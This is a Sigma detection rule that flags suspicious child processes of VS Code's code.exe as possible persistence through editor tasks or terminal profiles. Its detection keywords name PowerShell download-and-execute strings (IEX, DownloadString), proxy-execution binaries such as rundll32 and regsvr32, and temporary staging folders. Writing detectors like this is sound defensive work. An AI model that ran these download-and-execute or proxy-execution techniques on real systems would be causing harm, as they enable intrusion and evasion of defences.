Potentially Suspicious Child Process Of VsCode

 1title: Potentially Suspicious Child Process Of VsCode
 2id: 5a3164f2-b373-4152-93cf-090b13c12d27
 3status: test
 4description: Detects uncommon or suspicious child processes spawning from a VsCode "code.exe" process. This could indicate an attempt of persistence via VsCode tasks or terminal profiles.
 5references:
 6    - https://twitter.com/nas_bench/status/1618021838407495681
 7    - https://twitter.com/nas_bench/status/1618021415852335105
 8author: Nasreddine Bencherchali (Nextron Systems)
 9date: 2023-01-26
10modified: 2023-10-25
11tags:
12    - attack.execution
13    - attack.defense-evasion
14    - attack.t1218
15    - attack.t1202
16logsource:
17    category: process_creation
18    product: windows
19detection:
20    selection_parent:
21        ParentImage|endswith: '\code.exe'
22    selection_children_images:
23        Image|endswith:
24            - '\calc.exe'
25            - '\regsvr32.exe'
26            - '\rundll32.exe'
27            - '\cscript.exe'
28            - '\wscript.exe'
29    selection_children_cli:
30        Image|endswith:
31            - '\powershell.exe'
32            - '\pwsh.exe'
33            - '\cmd.exe'
34        CommandLine|contains:
35            - 'Invoke-Expressions'
36            - 'IEX'
37            - 'Invoke-Command'
38            - 'ICM'
39            - 'DownloadString'
40            - 'rundll32'
41            - 'regsvr32'
42            - 'wscript'
43            - 'cscript'
44    selection_children_paths:
45        Image|contains:
46            # Add more suspicious locations
47            - ':\Users\Public\'
48            - ':\Windows\Temp\'
49            - ':\Temp\'
50    condition: selection_parent and 1 of selection_children_*
51falsepositives:
52    - In development environment where VsCode is used heavily. False positives may occur when developers use task to compile or execute different types of code. Remove or add processes accordingly
53level: medium